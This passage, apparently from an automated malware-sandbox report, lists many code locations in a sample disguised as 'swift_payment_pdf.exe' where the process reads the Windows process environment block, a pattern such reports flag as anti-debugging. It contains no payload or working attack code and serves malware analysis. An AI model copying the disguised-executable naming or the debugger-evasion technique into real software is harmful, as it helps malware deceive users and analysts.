            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FE10E mov eax, dword ptr fs:[00000030h]5_2_013FE10E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FE10E mov eax, dword ptr fs:[00000030h]5_2_013FE10E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FE10E mov ecx, dword ptr fs:[00000030h]5_2_013FE10E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FE10E mov eax, dword ptr fs:[00000030h]5_2_013FE10E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FE10E mov ecx, dword ptr fs:[00000030h]5_2_013FE10E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01410115 mov eax, dword ptr fs:[00000030h]5_2_01410115
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01356154 mov eax, dword ptr fs:[00000030h]5_2_01356154
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01356154 mov eax, dword ptr fs:[00000030h]5_2_01356154
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134C156 mov eax, dword ptr fs:[00000030h]5_2_0134C156
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E8158 mov eax, dword ptr fs:[00000030h]5_2_013E8158
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E4144 mov eax, dword ptr fs:[00000030h]5_2_013E4144
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E4144 mov eax, dword ptr fs:[00000030h]5_2_013E4144
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E4144 mov ecx, dword ptr fs:[00000030h]5_2_013E4144
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E4144 mov eax, dword ptr fs:[00000030h]5_2_013E4144
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E4144 mov eax, dword ptr fs:[00000030h]5_2_013E4144
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014161C3 mov eax, dword ptr fs:[00000030h]5_2_014161C3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014161C3 mov eax, dword ptr fs:[00000030h]5_2_014161C3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D019F mov eax, dword ptr fs:[00000030h]5_2_013D019F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D019F mov eax, dword ptr fs:[00000030h]5_2_013D019F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D019F mov eax, dword ptr fs:[00000030h]5_2_013D019F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D019F mov eax, dword ptr fs:[00000030h]5_2_013D019F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134A197 mov eax, dword ptr fs:[00000030h]5_2_0134A197
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134A197 mov eax, dword ptr fs:[00000030h]5_2_0134A197
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134A197 mov eax, dword ptr fs:[00000030h]5_2_0134A197
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014261E5 mov eax, dword ptr fs:[00000030h]5_2_014261E5
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01390185 mov eax, dword ptr fs:[00000030h]5_2_01390185
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F4180 mov eax, dword ptr fs:[00000030h]5_2_013F4180
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F4180 mov eax, dword ptr fs:[00000030h]5_2_013F4180
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013801F8 mov eax, dword ptr fs:[00000030h]5_2_013801F8
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0140C188 mov eax, dword ptr fs:[00000030h]5_2_0140C188
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0140C188 mov eax, dword ptr fs:[00000030h]5_2_0140C188
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CE1D0 mov eax, dword ptr fs:[00000030h]5_2_013CE1D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CE1D0 mov eax, dword ptr fs:[00000030h]5_2_013CE1D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CE1D0 mov ecx, dword ptr fs:[00000030h]5_2_013CE1D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CE1D0 mov eax, dword ptr fs:[00000030h]5_2_013CE1D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CE1D0 mov eax, dword ptr fs:[00000030h]5_2_013CE1D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E6030 mov eax, dword ptr fs:[00000030h]5_2_013E6030
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134A020 mov eax, dword ptr fs:[00000030h]5_2_0134A020
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134C020 mov eax, dword ptr fs:[00000030h]5_2_0134C020
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136E016 mov eax, dword ptr fs:[00000030h]5_2_0136E016
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136E016 mov eax, dword ptr fs:[00000030h]5_2_0136E016
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136E016 mov eax, dword ptr fs:[00000030h]5_2_0136E016
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136E016 mov eax, dword ptr fs:[00000030h]5_2_0136E016
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D4000 mov ecx, dword ptr fs:[00000030h]5_2_013D4000
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F2000 mov eax, dword ptr fs:[00000030h]5_2_013F2000
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F2000 mov eax, dword ptr fs:[00000030h]5_2_013F2000
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F2000 mov eax, dword ptr fs:[00000030h]5_2_013F2000
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F2000 mov eax, dword ptr fs:[00000030h]5_2_013F2000
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F2000 mov eax, dword ptr fs:[00000030h]5_2_013F2000
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F2000 mov eax, dword ptr fs:[00000030h]5_2_013F2000
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F2000 mov eax, dword ptr fs:[00000030h]5_2_013F2000
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F2000 mov eax, dword ptr fs:[00000030h]5_2_013F2000
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137C073 mov eax, dword ptr fs:[00000030h]5_2_0137C073
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01352050 mov eax, dword ptr fs:[00000030h]5_2_01352050
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D6050 mov eax, dword ptr fs:[00000030h]5_2_013D6050
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013480A0 mov eax, dword ptr fs:[00000030h]5_2_013480A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E80A8 mov eax, dword ptr fs:[00000030h]5_2_013E80A8
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135208A mov eax, dword ptr fs:[00000030h]5_2_0135208A
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134C0F0 mov eax, dword ptr fs:[00000030h]5_2_0134C0F0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013920F0 mov ecx, dword ptr fs:[00000030h]5_2_013920F0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0134A0E3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013580E9 mov eax, dword ptr fs:[00000030h]5_2_013580E9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D60E0 mov eax, dword ptr fs:[00000030h]5_2_013D60E0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D20DE mov eax, dword ptr fs:[00000030h]5_2_013D20DE
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014160B8 mov eax, dword ptr fs:[00000030h]5_2_014160B8
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014160B8 mov ecx, dword ptr fs:[00000030h]5_2_014160B8
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0142634F mov eax, dword ptr fs:[00000030h]5_2_0142634F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141A352 mov eax, dword ptr fs:[00000030h]5_2_0141A352
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134C310 mov ecx, dword ptr fs:[00000030h]5_2_0134C310
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01370310 mov ecx, dword ptr fs:[00000030h]5_2_01370310
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138A30B mov eax, dword ptr fs:[00000030h]5_2_0138A30B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138A30B mov eax, dword ptr fs:[00000030h]5_2_0138A30B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138A30B mov eax, dword ptr fs:[00000030h]5_2_0138A30B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F437C mov eax, dword ptr fs:[00000030h]5_2_013F437C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D035C mov eax, dword ptr fs:[00000030h]5_2_013D035C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D035C mov eax, dword ptr fs:[00000030h]5_2_013D035C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D035C mov eax, dword ptr fs:[00000030h]5_2_013D035C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D035C mov ecx, dword ptr fs:[00000030h]5_2_013D035C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D035C mov eax, dword ptr fs:[00000030h]5_2_013D035C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D035C mov eax, dword ptr fs:[00000030h]5_2_013D035C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01428324 mov eax, dword ptr fs:[00000030h]5_2_01428324
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01428324 mov ecx, dword ptr fs:[00000030h]5_2_01428324
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01428324 mov eax, dword ptr fs:[00000030h]5_2_01428324
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01428324 mov eax, dword ptr fs:[00000030h]5_2_01428324
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F8350 mov ecx, dword ptr fs:[00000030h]5_2_013F8350
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D2349 mov eax, dword ptr fs:[00000030h]5_2_013D2349
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0140C3CD mov eax, dword ptr fs:[00000030h]5_2_0140C3CD
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01348397 mov eax, dword ptr fs:[00000030h]5_2_01348397
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01348397 mov eax, dword ptr fs:[00000030h]5_2_01348397
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01348397 mov eax, dword ptr fs:[00000030h]5_2_01348397
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137438F mov eax, dword ptr fs:[00000030h]5_2_0137438F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137438F mov eax, dword ptr fs:[00000030h]5_2_0137438F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134E388 mov eax, dword ptr fs:[00000030h]5_2_0134E388
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134E388 mov eax, dword ptr fs:[00000030h]5_2_0134E388
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134E388 mov eax, dword ptr fs:[00000030h]5_2_0134E388
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136E3F0 mov eax, dword ptr fs:[00000030h]5_2_0136E3F0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136E3F0 mov eax, dword ptr fs:[00000030h]5_2_0136E3F0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136E3F0 mov eax, dword ptr fs:[00000030h]5_2_0136E3F0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013863FF mov eax, dword ptr fs:[00000030h]5_2_013863FF
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013603E9 mov eax, dword ptr fs:[00000030h]5_2_013603E9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013603E9 mov eax, dword ptr fs:[00000030h]5_2_013603E9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013603E9 mov eax, dword ptr fs:[00000030h]5_2_013603E9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013603E9 mov eax, dword ptr fs:[00000030h]5_2_013603E9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013603E9 mov eax, dword ptr fs:[00000030h]5_2_013603E9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013603E9 mov eax, dword ptr fs:[00000030h]5_2_013603E9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013603E9 mov eax, dword ptr fs:[00000030h]5_2_013603E9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013603E9 mov eax, dword ptr fs:[00000030h]5_2_013603E9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FE3DB mov eax, dword ptr fs:[00000030h]5_2_013FE3DB
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FE3DB mov eax, dword ptr fs:[00000030h]5_2_013FE3DB
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FE3DB mov ecx, dword ptr fs:[00000030h]5_2_013FE3DB
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FE3DB mov eax, dword ptr fs:[00000030h]5_2_013FE3DB
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F43D4 mov eax, dword ptr fs:[00000030h]5_2_013F43D4
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F43D4 mov eax, dword ptr fs:[00000030h]5_2_013F43D4
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A3C0 mov eax, dword ptr fs:[00000030h]5_2_0135A3C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A3C0 mov eax, dword ptr fs:[00000030h]5_2_0135A3C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A3C0 mov eax, dword ptr fs:[00000030h]5_2_0135A3C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A3C0 mov eax, dword ptr fs:[00000030h]5_2_0135A3C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A3C0 mov eax, dword ptr fs:[00000030h]5_2_0135A3C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A3C0 mov eax, dword ptr fs:[00000030h]5_2_0135A3C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013583C0 mov eax, dword ptr fs:[00000030h]5_2_013583C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013583C0 mov eax, dword ptr fs:[00000030h]5_2_013583C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013583C0 mov eax, dword ptr fs:[00000030h]5_2_013583C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013583C0 mov eax, dword ptr fs:[00000030h]5_2_013583C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D63C0 mov eax, dword ptr fs:[00000030h]5_2_013D63C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134823B mov eax, dword ptr fs:[00000030h]5_2_0134823B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0140A250 mov eax, dword ptr fs:[00000030h]5_2_0140A250
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0140A250 mov eax, dword ptr fs:[00000030h]5_2_0140A250
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0142625D mov eax, dword ptr fs:[00000030h]5_2_0142625D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01354260 mov eax, dword ptr fs:[00000030h]5_2_01354260
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01354260 mov eax, dword ptr fs:[00000030h]5_2_01354260
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01354260 mov eax, dword ptr fs:[00000030h]5_2_01354260
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134826B mov eax, dword ptr fs:[00000030h]5_2_0134826B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134A250 mov eax, dword ptr fs:[00000030h]5_2_0134A250
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01356259 mov eax, dword ptr fs:[00000030h]5_2_01356259
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D8243 mov eax, dword ptr fs:[00000030h]5_2_013D8243
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D8243 mov ecx, dword ptr fs:[00000030h]5_2_013D8243
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014262D6 mov eax, dword ptr fs:[00000030h]5_2_014262D6
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013602A0 mov eax, dword ptr fs:[00000030h]5_2_013602A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013602A0 mov eax, dword ptr fs:[00000030h]5_2_013602A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E62A0 mov eax, dword ptr fs:[00000030h]5_2_013E62A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E62A0 mov ecx, dword ptr fs:[00000030h]5_2_013E62A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E62A0 mov eax, dword ptr fs:[00000030h]5_2_013E62A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E62A0 mov eax, dword ptr fs:[00000030h]5_2_013E62A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E62A0 mov eax, dword ptr fs:[00000030h]5_2_013E62A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E62A0 mov eax, dword ptr fs:[00000030h]5_2_013E62A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138E284 mov eax, dword ptr fs:[00000030h]5_2_0138E284
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138E284 mov eax, dword ptr fs:[00000030h]5_2_0138E284
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D0283 mov eax, dword ptr fs:[00000030h]5_2_013D0283
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D0283 mov eax, dword ptr fs:[00000030h]5_2_013D0283
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D0283 mov eax, dword ptr fs:[00000030h]5_2_013D0283
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013602E1 mov eax, dword ptr fs:[00000030h]5_2_013602E1
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013602E1 mov eax, dword ptr fs:[00000030h]5_2_013602E1
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013602E1 mov eax, dword ptr fs:[00000030h]5_2_013602E1
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A2C3 mov eax, dword ptr fs:[00000030h]5_2_0135A2C3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A2C3 mov eax, dword ptr fs:[00000030h]5_2_0135A2C3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A2C3 mov eax, dword ptr fs:[00000030h]5_2_0135A2C3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A2C3 mov eax, dword ptr fs:[00000030h]5_2_0135A2C3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A2C3 mov eax, dword ptr fs:[00000030h]5_2_0135A2C3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360535 mov eax, dword ptr fs:[00000030h]5_2_01360535
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360535 mov eax, dword ptr fs:[00000030h]5_2_01360535
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360535 mov eax, dword ptr fs:[00000030h]5_2_01360535
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360535 mov eax, dword ptr fs:[00000030h]5_2_01360535
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360535 mov eax, dword ptr fs:[00000030h]5_2_01360535
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360535 mov eax, dword ptr fs:[00000030h]5_2_01360535
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E53E mov eax, dword ptr fs:[00000030h]5_2_0137E53E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E53E mov eax, dword ptr fs:[00000030h]5_2_0137E53E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E53E mov eax, dword ptr fs:[00000030h]5_2_0137E53E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E53E mov eax, dword ptr fs:[00000030h]5_2_0137E53E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E53E mov eax, dword ptr fs:[00000030h]5_2_0137E53E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E6500 mov eax, dword ptr fs:[00000030h]5_2_013E6500
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01424500 mov eax, dword ptr fs:[00000030h]5_2_01424500
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01424500 mov eax, dword ptr fs:[00000030h]5_2_01424500
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01424500 mov eax, dword ptr fs:[00000030h]5_2_01424500
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01424500 mov eax, dword ptr fs:[00000030h]5_2_01424500
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01424500 mov eax, dword ptr fs:[00000030h]5_2_01424500
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01424500 mov eax, dword ptr fs:[00000030h]5_2_01424500
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01424500 mov eax, dword ptr fs:[00000030h]5_2_01424500
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138656A mov eax, dword ptr fs:[00000030h]5_2_0138656A
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138656A mov eax, dword ptr fs:[00000030h]5_2_0138656A
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138656A mov eax, dword ptr fs:[00000030h]5_2_0138656A
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01358550 mov eax, dword ptr fs:[00000030h]5_2_01358550
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01358550 mov eax, dword ptr fs:[00000030h]5_2_01358550
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013745B1 mov eax, dword ptr fs:[00000030h]5_2_013745B1
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013745B1 mov eax, dword ptr fs:[00000030h]5_2_013745B1
